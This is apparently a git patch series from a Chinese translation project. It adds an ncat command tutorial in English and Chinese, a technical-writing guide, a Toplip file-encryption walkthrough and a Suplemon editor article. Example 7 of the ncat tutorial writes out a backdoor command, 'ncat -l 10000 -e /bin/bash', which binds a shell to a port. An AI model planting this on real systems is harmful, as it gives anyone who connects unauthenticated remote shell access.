-``` -$ ncat -u -l 80 -c 'ncat -u -l 8080' -``` - -Now all the connections for port 80 will be forwarded to port 8080. - -#### Example: 9) Set Connection timeouts - -Listener mode in ncat will continue to run & would have to be terminated manually. But we can configure timeouts with option ‘w’, - -``` -$ ncat -w 10 192.168.1.100 8080 -``` - -This will cause connection to be terminated in 10 seconds, but it can only be used on client side & not on server side. - -#### Example: 10) Force server to stay up using -k option in ncat - -When client disconnects from server, after sometime server also stops listening. But we can force server to stay connected & continuing port listening with option ‘k’. Run the following command, - -``` -$ ncat -l -k 8080 -``` - -Now server will stay up, even if a connection from client is broken. - -With this we end our tutorial, please feel free to ask any question regarding this article using the comment box below. - --------------------------------------------------------------------------------- - -via: https://www.linuxtechi.com/nc-ncat-command-examples-linux-systems/ - -作者:[Pradeep Kumar][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linuxtechi.com/author/pradeep/ -[1]:https://www.linuxtechi.com/wp-content/uploads/2017/12/nc-ncat-command-examples-Linux-Systems.jpg diff --git a/translated/tech/20171206 10 useful ncat (nc) Command Examples for Linux Systems.md b/translated/tech/20171206 10 useful ncat (nc) Command Examples for Linux Systems.md new file mode 100644 index 0000000000..914aea87ea --- /dev/null +++ b/translated/tech/20171206 10 useful ncat (nc) Command Examples for Linux Systems.md @@ -0,0 +1,199 @@ +10 个例子教你学会 ncat (nc) 命令 +====== + [![nc-ncat-command-examples-Linux-Systems](https://www.linuxtechi.com/wp-content/uploads/2017/12/nc-ncat-command-examples-Linux-Systems.jpg)][1] + +ncat 或者说 nc 是一款功能类似 cat 的网络工具。它是一款拥有多种功能的 CLI 工具,可以用来在网络上读,写以及重定向数据。 它被设计成可以被脚本或其他程序调用的可靠后端工具。 同时由于它能创建任意所需的连接,因此也是一个很好的网络调试工具。 + +ncat/nc 既是一个端口扫描工具,也是一款安全工具, 还能是一款检测工具,甚至可以做一个简单的 TCP 代理。 由于有这么多的功能,它被誉为是网络界的瑞士军刀。 这是每个系统管理员都应该知道并且掌握它。 + +在大多数 Debian 发行版中,`nc` 是默认可用的,它会在安装系统的过程中自动被安装。 但是在 CentOS 7 / RHEL 7 的最小化安装中,`nc` 并不会默认被安装。 你需要用下列命令手工安装。 + +``` +[root@linuxtechi ~]# yum install nmap-ncat -y +``` + +系统管理员可以用它来审计系统安全,用它来找出开放的端口然后保护这些端口。 管理员还能用它作为客户端来审计 Web 服务器, 远程登陆服务器, 邮件服务器等, 通过 `nc` 我们可以控制发送的每个字符,也可以查看对方的回应。 + +我们还可以 o 用它捕获客户端发送的数据一次来了解这些客户端是做什么的。 + +在本文中,我们会通过 10 个例子来学习如何使用 `nc` 命令。 + +### 例子: 1) 监听入站连接 + +通过 `l` 选项,ncat 可以进入监听模式,使我们可以在指定端口监听入站连接。 完整的命令是这样的 + +$ ncat -l port_number + +比如, + +``` +$ ncat -l 8080 +``` + +服务器就会开始在 8080 端口监听入站连接。 + +### 例子: 2) 连接远程系统 + +使用下面命令可以用 nc 来连接远程系统, + +$ ncat IP_address port_number + +让我们来看个例子, + +``` +$ ncat 192。168。1。100 80 +``` + +这会创建一个连接,连接到 IP 为 192。168。1。100 的服务器上的 80 端口,然后我们就可以向服务器发送指令了。 比如我们可以输入下面内容来获取完整的网页内容 + +GET / HTTP/1.1 + +或者获取页面名称, + +GET / HTTP/1.1 + +或者我们可以通过以下方式获得操作系统指纹标识, + +HEAD / HTTP/1.1 + +这会告诉我们使用的是什么软件来运行这个 web 服务器的。 + +### 例子: 3) 连接 UDP 端口 + +默认情况下,nc 创建连接时只会连接 TCP 端口。 不过我们可以使用 `u` 选项来连接到 UDP 端口, + +``` +$ ncat -l -u 1234 +``` + +现在我们的系统会开始监听 udp 的'1234'端口,我们可以使用下面的 netstat 命令来验证这一点, + +``` +$ netstat -tunlp | grep 1234 +udp 0 0 0。0。0。0:1234 0。0。0。0:* 17341/nc +udp6 0 0 :::1234 :::* 17341/nc +``` + +假设我们想发送或者说测试某个远程主机 UDP 端口的连通性,我们可以使用下面命令, + +$ ncat -v -u {host-ip} {udp-port} + +比如: + +``` +[root@localhost ~]# ncat -v -u 192。168。105。150 53 +Ncat: Version 6。40 ( http://nmap.org/ncat ) +Ncat: Connected to 192。168。105。150:53。 +``` + +#### 例子: 4) 将 NC 作为聊天工具 + +NC 也可以作为聊天工具来用,我们可以配置服务器监听某个端口,然后从远程主机上连接到服务器的这个端口,就可以开始发送消息了。 在服务器这端运行: + +``` +$ ncat -l 8080 +``` + +在远程客户端主机上运行: + +``` +$ ncat 192。168。1。100 8080 +``` + +之后开始发送消息,这些消息会在服务器终端上显示出来。 + +#### 例子: 5) 将 NC 作为代理 + +NC 也可以用来做代理。比如下面这个例子, + +``` +$ ncat -l 8080 | ncat 192。168。1。200 80 +``` + +所有发往我们服务器 8080 端口的连接都会自动转发到 192。168。1。200 上的 80 端口。 不过由于我们使用了管道,数据只能被单向传输。 要同时能够接受返回的数据,我们需要创建一个双向管道。 使用下面命令可以做到这点: + +``` +$ mkfifo 2way +$ ncat -l 8080 0<2way | ncat 192。168。1。200 80 1>2way +``` + +现在你可以通过 nc 代理来收发数据了。 + +#### 例子: 6) 使用 nc/ncat 拷贝文件 + +NC 还能用来在系统间拷贝文件,虽然这么做并不推荐,因为绝大多数系统默认都安装了 ssh/scp。 不过如果你恰好遇见个没有 ssh/scp 的系统的话, 你可以用 nc 来作最后的努力。 + +在要接受数据的机器上启动 nc 并让它进入监听模式: + +``` +$ ncat -l 8080 > file.txt +``` + +现在去要被拷贝数据的机器上运行下面命令: + +``` +$ ncat 192。168。1。100 8080 --send-only < data.txt +``` + +这里,data.txt 是要发送的文件。 –send-only 选项会在文件拷贝完后立即关闭连接。 如果不加该选项, 我们需要手工按下 ctrl+c to 来关闭连接。 + +我们也可以用这种方法拷贝整个磁盘分区,不过请一定要小心。 + +#### 例子: 7) 通过 nc/ncat 创建后门 + +NC 命令还可以用来在系统中创建后门,并且这种技术也确实被黑客大量使用。 为了保护我们的系统,我们需要知道它是怎么做的。 创建后门的命令为: + +``` +$ ncat -l 10000 -e /bin/bash +``` + +‘e‘ 标志将一个 bash 与端口 10000 相连。现在客户端只要连接到服务器上的 10000 端口就能通过 bash 获取我们系统的完整访问权限: + +``` +$ ncat 192。168。1。100 10000 +``` + +#### 例子: 8) 通过 nc/ncat 进行端口转发 + +我们通过选项 `c` 来用 NC 进行端口转发,实现端口转发的语法为: + +``` +$ ncat -u -l 80 -c 'ncat -u -l 8080' +``` + +这样,所有连接到 80 端口的连接都会转发到 8080 端口。 + +#### 例子: 9) 设置连接超时 + +ncat 的监听模式会一直运行,直到手工终止。 不过我们可以通过选项 `w` 设置超时时间: + +``` +$ ncat -w 10 192。168。1。100 8080 +``` + +这回导致连接 10 秒后终止,不过这个选项只能用于客户端而不是服务端。 + +#### 例子: 10) 使用 -k 选项强制 ncat 待命 + +当客户端从服务端断开连接后,过一段时间服务端也会停止监听。 但通过选项 `k` 我们可以强制服务器保持连接并继续监听端口。 命令如下: + +``` +$ ncat -l -k 8080 +``` + +现在即使来自客户端的连接断了也依然会处于待命状态。 + +自此我们的教程就完了,如有疑问,请在下方留言。 + +-------------------------------------------------------------------------------- + +via: https://www.linuxtechi.com/nc-ncat-command-examples-linux-systems/ + +作者:[Pradeep Kumar][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxtechi.com/author/pradeep/ +[1]:https://www.linuxtechi.com/wp-content/uploads/2017/12/nc-ncat-command-examples-Linux-Systems.jpg From 6d2dd585ccf62cb72f11f02fd5dba1d88047dcab Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 12 Dec 2017 14:35:31 +0800 Subject: [PATCH 0504/1627] =?UTF-8?q?=E7=9B=AE=E5=BD=95=E4=B8=8D=E5=AF=B9?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @darsh8 目录不对~我帮你挪下。 --- .../{ => talk}/20170131 Book review Ours to Hack and to Own.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename translated/{ => talk}/20170131 Book review Ours to Hack and to Own.md (100%) diff --git a/translated/20170131 Book review Ours to Hack and to Own.md b/translated/talk/20170131 Book review Ours to Hack and to Own.md similarity index 100% rename from translated/20170131 Book review Ours to Hack and to Own.md rename to translated/talk/20170131 Book review Ours to Hack and to Own.md From 2220feb1ad1c97c6b50be79c1b633abc4abe3e4d Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 12 Dec 2017 14:40:56 +0800 Subject: [PATCH 0505/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=207=20rules=20for?= =?UTF-8?q?=20avoiding=20documentation=20pitfalls?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...les for avoiding documentation pitfalls.md | 133 ++++++++++++++++++ 1 file changed, 133 insertions(+) create mode 100644 sources/tech/20171205 7 rules for avoiding documentation pitfalls.md diff --git a/sources/tech/20171205 7 rules for avoiding documentation pitfalls.md b/sources/tech/20171205 7 rules for avoiding documentation pitfalls.md new file mode 100644 index 0000000000..8d4b4407f0 --- /dev/null +++ b/sources/tech/20171205 7 rules for avoiding documentation pitfalls.md @@ -0,0 +1,133 @@ +translating by lujun9972 +7 rules for avoiding documentation pitfalls +====== +English serves as _lingua franca_ in the open source community. To reduce +translation costs, many teams have switched to English as the source language +for their documentation. But surprisingly, writing in English for an +international audience does not necessarily put native English speakers in a +better position. On the contrary, they tend to forget that the document 's +language might not be the audience's first language. + +Let's have a look at the following simple sentence as an example: "Encrypt the +password using the `foo bar` command." Grammatically, the sentence is correct. +Given that '-ing' forms (gerunds) are frequently used in the English language +and most native speakers consider them an elegant way of expressing things, +native speakers usually do not hesitate to phrase a sentence like this. On +closer inspection, the sentence is ambiguous because "using" may refer either +to the object ("the password") or to the verb ("encrypt"). Thus, the sentence +can be interpreted in two different ways: + + * "Encrypt the password that uses the `foo bar` command." + * "Encrypt the password by using the `foo bar` command." + +As long as you have previous knowledge about the topic (password encryption or +the `foo bar` command), you can resolve this ambiguity and correctly decide +that the second version is the intended meaning of this sentence. But what if +you lack in-depth knowledge of the topic? What if you are not an expert, but a +translator with only general knowledge of the subject? Or if you are a non- +native speaker of English, unfamiliar with advanced grammatical forms like +gerunds? + +Even native English speakers need training to write clear and straightforward +technical documentation. The first step is to raise awareness about the +usability of texts and potential problems, so let's look at seven rules that +can help avoid common pitfalls. + +### 1. Know your target audience and step into their shoes. + +If you are a developer writing for end users, view the product from their +perspective. Does the structure reflect the users' goals? The [persona +technique][1] can help you to focus on the target audience and provide the +right level of detail for your readers. + +### 2. Follow the KISS principle--keep it short and simple. + +The principle can be applied on several levels, such as grammar, sentences, or +words. Here are examples: + + * Use the simplest tense that is appropriate. For example, use present tense when mentioning the result of an action: + * " ~~Click 'OK.' The 'Printer Options' dialog will appear.~~" -> "Click 'OK.' The 'Printer Options' dialog appears." + * As a rule of thumb, present one idea in one sentence; however, short sentences are not automatically easy to understand (especially if they are an accumulation of nouns). Sometimes, trimming down sentences to a certain word count can introduce ambiguities. In turn, this makes the sentences more difficult to understand. + * Uncommon and long words slow reading and might be obstacles for non-native speakers. Use simpler alternatives: + + * " ~~utilize~~ " -> "use" + * " ~~indicate~~ " -> "show," "tell," or "say" + * " ~~prerequisite~~ " -> "requirement" + +### 3. Avoid disturbing the reading flow. + +Move particles or longer parentheses to the beginning or end of a sentence: + + * " ~~They are not, however, marked as installed.~~ " -> "However, they are not marked as installed." + +Place long commands at the end of a sentence. This also results in better +segmentation of sentences for automatic or semi-automatic translations. + +### 4. Discriminate between two basic information types. + +Discriminating between _descriptive information_ and _task-based information_ +is useful. Typical examples for descriptive information are command-line +references, whereas how-to 's are task-based information; however, both +information types are needed in technical writing. On closer inspection, many +texts contain a mixture of both information types. Clearly separating the +information types is helpful. For better orientation, label them accordingly. +Titles should reflect a section's content and information type. Use noun-based +titles for descriptive sections ("Types of Frobnicators") and verbally phrased +titles for task-based sections ("Installing Frobnicators"). This helps readers +quickly identify the sections they are interested in and allows them to skip +the ones they don't need at the moment. + +### 5. Consider different reading situations and modes of text consumption. + +Some of your readers are already frustrated when they turn to the product +documentation because they could not achieve a certain goal on their own. They +might also work in a noisy environment that makes it hard to focus on reading. +Also, do not expect your audience to read cover to cover, as many people skim +or browse texts for keywords or look up topics by using tables, indexes, or +full-text search. With that in mind, look at your text from different +perspectives. Often, compromises are needed to find a text structure that +works well for multiple situations. + +### 6. Break down complex information into smaller chunks. + +This makes it easier for the audience to remember and process the information. +For example, procedures should not exceed seven to 10 steps (according to +[Miller's Law][2] in cognitive psychology). If more steps are required, split +the task into separate procedures. + +### 7. Form follows function. + +Examine your text according to the question: What is the _purpose_ (function) +of a certain sentence, a paragraph, or a section? For example, is it an +instruction? A result? A warning? For instructions, use active voice: +"Configure the system." Passive voice may be appropriate for descriptions: +"The system is configured automatically." Add warnings _before_ the step or +action where danger arises. Focusing on the purpose also helps detect +redundant content to help eliminate fillers like "basically" or "easily," +unnecessary modifications like " ~~already~~ existing " or " ~~completely~~ +new, " or any content that is not relevant for your target audience. + +As you might have guessed by now, writing is re-writing. Good writing requires +effort and practice. Even if you write only occasionally, you can +significantly improve your texts by focusing on the target audience and +following the rules above. The better the readability of a text, the easier it +is to process, even for audiences with varying language skills. Especially +when it comes to localization, good quality of the source text is important: +"Garbage in, garbage out." If the original text has deficiencies, translating +the text takes longer, resulting in higher costs. In the worst case, flaws are +multiplied during translation and must be corrected in various languages. + + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/12/7-rules + +作者:[Tanja Roth][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com +[1]:https://en.wikipedia.org/wiki/Persona_(user_experience) +[2]:https://en.wikipedia.org/wiki/The_Magical_Number_Seven,_Plus_or_Minus_Two From 1211adee5f3197124bed888c1366ccda8ee7df32 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 12 Dec 2017 14:55:35 +0800 Subject: [PATCH 0506/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Toplip=20?= =?UTF-8?q?=E2=80=93=20A=20Very=20Strong=20File=20Encryption=20And=20Decry?= =?UTF-8?q?ption=20CLI=20Utility?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ile Encryption And Decryption CLI Utility.md | 282 ++++++++++++++++++ 1 file changed, 282 insertions(+) create mode 100644 sources/tech/20171212 Toplip – A Very Strong File Encryption And Decryption CLI Utility.md diff --git a/sources/tech/20171212 Toplip – A Very Strong File Encryption And Decryption CLI Utility.md b/sources/tech/20171212 Toplip – A Very Strong File Encryption And Decryption CLI Utility.md new file mode 100644 index 0000000000..ad3528f60b --- /dev/null +++ b/sources/tech/20171212 Toplip – A Very Strong File Encryption And Decryption CLI Utility.md @@ -0,0 +1,282 @@ +Toplip – A Very Strong File Encryption And Decryption CLI Utility +====== +There are numerous file encryption tools available on the market to protect +your files. We have already reviewed some encryption tools such as +[**Cryptomater**][1], [**Cryptkeeper**][2], [**CryptGo**][3], [**Cryptr**][4], +[**Tomb**][5], and [**GnuPG**][6] etc. Today, we will be discussing yet +another file encryption and decryption command line utility named **" +Toplip"**. It is a free and open source encryption utility that uses a very +strong encryption method called **[AES256][7]** , along with an **XTS-AES** +design to safeguard your confidential data. Also, it uses [**Scrypt**][8], a +password-based key derivation function, to protect your passphrases against +brute-force attacks. + +### Prominent features + +Compared to other file encryption tools, toplip ships with the following +unique and prominent features. + + * Very strong XTS-AES256 based encryption method. + * Plausible deniability. + * Encrypt files inside images (PNG/JPG). + * Multiple passphrase protection. + * Simplified brute force recovery protection. + * No identifiable output markers. + * Open source/GPLv3. + +### Installing Toplip + +There is no installation required. Toplip is a standalone executable binary +file. All you have to do is download the latest toplip from the [**official +products page**][9] and make it as executable. To do so, just run: + +``` +chmod +x toplip +``` + +### Usage + +If you run toplip without any arguments, you will see the help section. + +``` +./toplip +``` + +[![][10]][11] + +Allow me to show you some examples. + +For the purpose of this guide, I have created two files namely **file1** and +**file2**. Also, I have an image file which we need it to hide the files +inside it. And finally, I have **toplip** executable binary file. I have kept +them all in a directory called **test**. + +[![][12]][13] + +**Encrypt/decrypt a single file** + +Now, let us encrypt **file1**. To do so, run: + +``` +./toplip file1 > file1.encrypted +``` + +This command will prompt you to enter a passphrase. Once you have given the +passphrase, it will encrypt the contents of **file1** and save them in a file +called **file1.encrypted** in your current working directory. + +Sample output of the above command would be: + +``` +This is toplip v1.20 (C) 2015, 2016 2 Ton Digital. Author: Jeff Marrison A showcase piece for the HeavyThing library. Commercial support available Proudly made in Cooroy, Australia. More info: https://2ton.com.au/toplip file1 Passphrase #1: generating keys...Done +Encrypting...Done +``` + +To verify if the file is really encrypted., try to open it and you will see +some random characters. + +To decrypt the encrypted file, use **-d** flag like below: + +``` +./toplip -d file1.encrypted +``` + +This command will decrypt the given file and display the contents in the +Terminal window. + +To restore the file instead of writing to stdout, do: + +``` +./toplip -d file1.encrypted > file1.decrypted +``` + +Enter the correct passphrase to decrypt the file. All contents of **file1.encrypted** will be restored in a file called **file1.decrypted**. + +Please don't follow this naming method. I used it for the sake of easy understanding. Use any other name(s) which is very hard to predict. + +**Encrypt/decrypt multiple files +** + +Now we will encrypt two files with two separate passphrases for each one. + +``` +./toplip -alt file1 file2 > file3.encrypted +``` + +You will be asked to enter passphrase for each file. Use different +passphrases. + +Sample output of the above command will be: + +``` +This is toplip v1.20 (C) 2015, 2016 2 Ton Digital. Author: Jeff Marrison A showcase piece for the HeavyThing library. Commercial support available Proudly made in Cooroy, Australia. More info: https://2ton.com.au/toplip +**file2 Passphrase #1** : generating keys...Done +**file1 Passphrase #1** : generating keys...Done +Encrypting...Done +``` + +What the above command will do is encrypt the contents of two files and save +them in a single file called **file3.encrypted**. While restoring, just give +the respective password. For example, if you give the passphrase of the file1, +toplip will restore file1. If you enter the passphrase of file2, toplip will +restore file2. + +Each **toplip** encrypted output may contain up to four wholly independent +files, and each created with their own separate and unique passphrase. Due to +the way the encrypted output is put together, there is no way to easily +determine whether or not multiple files actually exist in the first place. By +default, even if only one file is encrypted using toplip, random data is added +automatically. If more than one file is specified, each with their own +passphrase, then you can selectively extract each file independently and thus +deny the existence of the other files altogether. This effectively allows a +user to open an encrypted bundle with controlled exposure risk, and no +computationally inexpensive way for an adversary to conclusively identify that +additional confidential data exists. This is called **Plausible deniability** +, one of the notable feature of toplip. + +To decrypt **file1** from **file3.encrypted** , just enter: + +``` +./toplip -d file3.encrypted > file1.encrypted +``` + +You will be prompted to enter the correct passphrase of file1. + +To decrypt **file2** from **file3.encrypted** , enter: + +``` +./toplip -d file3.encrypted > file2.encrypted +``` + +Do not forget to enter the correct passphrase of file2. + +**Use multiple passphrase protection** + +This is another cool feature that I admire. We can provide multiple +passphrases for a single file when encrypting it. It will protect the +passphrases against brute force attempts. + +``` +./toplip -c 2 file1 > file1.encrypted +``` + +Here, **-c 2** represents two different passphrases. Sample output of above +command would be: + +``` +This is toplip v1.20 (C) 2015, 2016 2 Ton Digital. Author: Jeff Marrison A showcase piece for the HeavyThing library. Commercial support available Proudly made in Cooroy, Australia. More info: https://2ton.com.au/toplip +**file1 Passphrase #1:** generating keys...Done +**file1 Passphrase #2:** generating keys...Done +Encrypting...Done +``` + +As you see in the above example, toplip prompted me to enter two passphrases. +Please note that you must **provide two different passphrases** , not a single +passphrase twice. + +To decrypt this file, do: + +``` +$ ./toplip -c 2 -d file1.encrypted > file1.decrypted +This is toplip v1.20 (C) 2015, 2016 2 Ton Digital. Author: Jeff Marrison A showcase piece for the HeavyThing library. Commercial support available Proudly made in Cooroy, Australia. More info: https://2ton.com.au/toplip +**file1.encrypted Passphrase #1:** generating keys...Done +**file1.encrypted Passphrase #2:** generating keys...Done +Decrypting...Done +``` + +**Hide files inside image** + +The practice of concealing a file, message, image, or video within another +file is called **steganography**. Fortunately, this feature exists in toplip +by default. + +To hide a file(s) inside images, use **-m** flag as shown below. + +``` +$ ./toplip -m image.png file1 > image1.png +This is toplip v1.20 (C) 2015, 2016 2 Ton Digital. Author: Jeff Marrison A showcase piece for the HeavyThing library. Commercial support available Proudly made in Cooroy, Australia. More info: https://2ton.com.au/toplip +file1 Passphrase #1: generating keys...Done +Encrypting...Done +``` + +This command conceals the contents of file1 inside an image named image1.png. +To decrypt it, run: + +``` +$ ./toplip -d image1.png > file1.decrypted This is toplip v1.20 (C) 2015, 2016 2 Ton Digital. Author: Jeff Marrison A showcase piece for the HeavyThing library. Commercial support available Proudly made in Cooroy, Australia. More info: https://2ton.com.au/toplip +image1.png Passphrase #1: generating keys...Done +Decrypting...Done +``` + +**Increase password complexity** + +To make things even harder to break, we can increase the password complexity +like below. + +``` +./toplip -c 5 -i 0x8000 -alt file1 -c 10 -i 10 file2 > file3.encrypted +``` + +The above command will prompt to you enter 10 passphrases for the file1, 5 +passphrases for the file2 and encrypt both of them in a single file called +"file3.encrypted". As you may noticed, we have used one more additional flag +**-i** in this example. This is used to specify key derivation iterations. +This option overrides the default iteration count of 1 for scrypt's initial +and final PBKDF2 stages. Hexadecimal or decimal values permitted, e.g. +**0x8000** , **10** , etc. Please note that this can dramatically increase the +calculation times. + +To decrypt file1, use: + +``` +./toplip -c 5 -i 0x8000 -d file3.encrypted > file1.decrypted +``` + +To decrypt file2, use: + +``` +./toplip -c 10 -i 10 -d file3.encrypted > file2.decrypted +``` + +To know more about the underlying technical information and crypto methods +used in toplip, refer its official website given at the end. + +My personal recommendation to all those who wants to protect their data. Don't +rely on single method. Always use more than one tools/methods to encrypt +files. Do not write passphrases/passwords in a paper and/or do not save them +in your local or cloud storage. Just memorize them and destroy the notes. If +you're poor at remembering passwords, consider to use any trustworthy password +managers. + +And, that's all. More good stuffs to come. Stay tuned! + +Cheers! + + + + +-------------------------------------------------------------------------------- + +via: https://www.ostechnix.com/toplip-strong-file-encryption-decryption-cli-utility/ + +作者:[SK][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ostechnix.com/author/sk/ +[1]:https://www.ostechnix.com/cryptomator-open-source-client-side-encryption-tool-cloud/ +[2]:https://www.ostechnix.com/how-to-encrypt-your-personal-foldersdirectories-in-linux-mint-ubuntu-distros/ +[3]:https://www.ostechnix.com/cryptogo-easy-way-encrypt-password-protect-files/ +[4]:https://www.ostechnix.com/cryptr-simple-cli-utility-encrypt-decrypt-files/ +[5]:https://www.ostechnix.com/tomb-file-encryption-tool-protect-secret-files-linux/ +[6]:https://www.ostechnix.com/an-easy-way-to-encrypt-and-decrypt-files-from-commandline-in-linux/ +[7]:http://en.wikipedia.org/wiki/Advanced_Encryption_Standard +[8]:http://en.wikipedia.org/wiki/Scrypt +[9]:https://2ton.com.au/Products/ +[10]:https://www.ostechnix.com/wp-content/uploads/2017/12/toplip-2.png%201366w,%20https://www.ostechnix.com/wp-content/uploads/2017/12/toplip-2-300x157.png%20300w,%20https://www.ostechnix.com/wp-content/uploads/2017/12/toplip-2-768x403.png%20768w,%20https://www.ostechnix.com/wp-content/uploads/2017/12/toplip-2-1024x537.png%201024w +[11]:http://www.ostechnix.com/wp-content/uploads/2017/12/toplip-2.png +[12]:https://www.ostechnix.com/wp-content/uploads/2017/12/toplip-1.png%20779w,%20https://www.ostechnix.com/wp-content/uploads/2017/12/toplip-1-300x101.png%20300w,%20https://www.ostechnix.com/wp-content/uploads/2017/12/toplip-1-768x257.png%20768w +[13]:http://www.ostechnix.com/wp-content/uploads/2017/12/toplip-1.png + From d83793cba44482333d3ae39711eb04e33caa6138 Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 12 Dec 2017 14:56:17 +0800 Subject: [PATCH 0507/1627] PRF&PUB:20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md @geekpi --- ...I Text Editor with Multi Cursor Support.md | 127 +++++++++++++++ ...I Text Editor with Multi Cursor Support.md | 151 ------------------ 2 files changed, 127 insertions(+), 151 deletions(-) create mode 100644 published/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md delete mode 100644 translated/tech/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md diff --git a/published/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md b/published/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md new file mode 100644 index 0000000000..9b768997e2 --- /dev/null +++ b/published/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md @@ -0,0 +1,127 @@ +Suplemon:带有多光标支持的现代 CLI 文本编辑器 +====== + +Suplemon 是一个 CLI 中的现代文本编辑器,它模拟 [Sublime Text][1] 的多光标行为和其它特性。它是轻量级的,非常易于使用,就像 Nano 一样。 + +使用 CLI 编辑器的好处之一是,无论你使用的 Linux 发行版是否有 GUI,你都可以使用它。这种文本编辑器也很简单、快速和强大。 + +你可以在其[官方仓库][2]中找到有用的信息和源代码。 + +### 功能 + +这些是一些它有趣的功能: + +* 多光标支持 +* 撤销/重做 +* 复制和粘贴,带有多行支持 +* 鼠标支持 +* 扩展 +* 查找、查找所有、查找下一个 +* 语法高亮 +* 自动完成 +* 自定义键盘快捷键 + +### 安装 + +首先,确保安装了最新版本的 python3 和 pip3。 + +然后在终端输入: + +``` +$ sudo pip3 install suplemon +``` + +### 使用 + +#### 在当前目录中创建一个新文件 + +打开一个终端并输入: + +``` +$ suplemon +``` + +你将看到如下: + +![suplemon new file](https://linoxide.com/wp-content/uploads/2017/11/suplemon-new-file.png) + +#### 打开一个或多个文件 + +打开一个终端并输入: + +``` +$ suplemon ... +``` + +例如: + +``` +$ suplemon example1.c example2.c +``` + +### 主要配置 + +你可以在 `~/.config/suplemon/suplemon-config.json` 找到配置文件。 + +编辑这个文件很简单,你只需要进入命令模式(进入 suplemon 后)并运行 `config` 命令。你可以通过运行 `config defaults` 来查看默认配置。 + +#### 键盘映射配置 + +我会展示 suplemon 的默认键映射。如果你想编辑它们,只需运行 `keymap` 命令。运行 `keymap default` 来查看默认的键盘映射文件。 + +| 操作 | 快捷键 | +| ---- | ---- | +| 退出| `Ctrl + Q`| +| 复制行到缓冲区|`Ctrl + C`| +| 剪切行缓冲区| `Ctrl + X`| +| 插入缓冲区| `Ctrl + V`| +| 复制行| `Ctrl + K`| +| 跳转| `Ctrl + G`。 你可以跳转到一行或一个文件(只需键入一个文件名的开头)。另外,可以输入类似于 `exam:50` 跳转到 `example.c` 第 `50` 行。| +| 用字符串或正则表达式搜索| `Ctrl + F`| +| 搜索下一个| `Ctrl + D`| +| 去除空格| `Ctrl + T`| +| 在箭头方向添加新的光标| `Alt + 方向键`| +| 跳转到上一个或下一个单词或行| `Ctrl + 左/右`| +| 恢复到单光标/取消输入提示| `Esc`| +| 向上/向下移动行| `Page Up` / `Page Down`| +| 保存文件|`Ctrl + S`| +| 用新名称保存文件|`F1`| +| 重新载入当前文件|`F2`| +| 打开文件|`Ctrl + O`| +| 关闭文件|`Ctrl + W`| +| 切换到下一个/上一个文件|`Ctrl + Page Up` / `Ctrl + Page Down`| +| 运行一个命令|`Ctrl + E`| +| 撤消|`Ctrl + Z`| +| 重做|`Ctrl + Y`| +| 触发可见的空格|`F7`| +| 切换鼠标模式|`F8`| +| 显示行号|`F9`| +| 显示全屏|`F11`| + + + +#### 鼠标快捷键 + +* 将光标置于指针位置:左键单击 +* 在指针位置添加一个光标:右键单击 +* 垂直滚动:向上/向下滚动滚轮 + +### 总结 + +在尝试 Suplemon 一段时间后,我改变了对 CLI 文本编辑器的看法。我以前曾经尝试过 Nano,是的,我喜欢它的简单性,但是它的现代特征的缺乏使它在日常使用中变得不实用。 + +这个工具有 CLI 和 GUI 世界最好的东西……简单性和功能丰富!所以我建议你试试看,并在评论中写下你的想法 :-) + +-------------------------------------------------------------------------------- + +via: https://linoxide.com/tools/suplemon-cli-text-editor-multi-cursor/ + +作者:[Ivo Ursino][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://linoxide.com/author/ursinov/ +[1]:https://linoxide.com/tools/install-sublime-text-editor-linux/ +[2]:https://github.com/richrd/suplemon/ diff --git a/translated/tech/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md b/translated/tech/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md deleted file mode 100644 index 4fc430ff2a..0000000000 --- a/translated/tech/20171129 Suplemon - Modern CLI Text Editor with Multi Cursor Support.md +++ /dev/null @@ -1,151 +0,0 @@ -Suplemon - 带有多光标支持的现代 CLI 文本编辑器 -====== -Suplemon 是一个 CLI 中的现代文本编辑器,它模拟 [Sublime Text][1] 的多光标行为和其他特性。它是轻量级的,非常易于使用,就像 Nano 一样。 - -使用 CLI 编辑器的好处之一是,无论你使用的 Linux 发行版是否有 GUI,你都可以使用它。这种文本编辑器也很简单、快速和强大。 - -你可以在[官方仓库][2]中找到有用的信息和源代码。 - -### 功能 - -这些事一些它有趣的功能: - -* 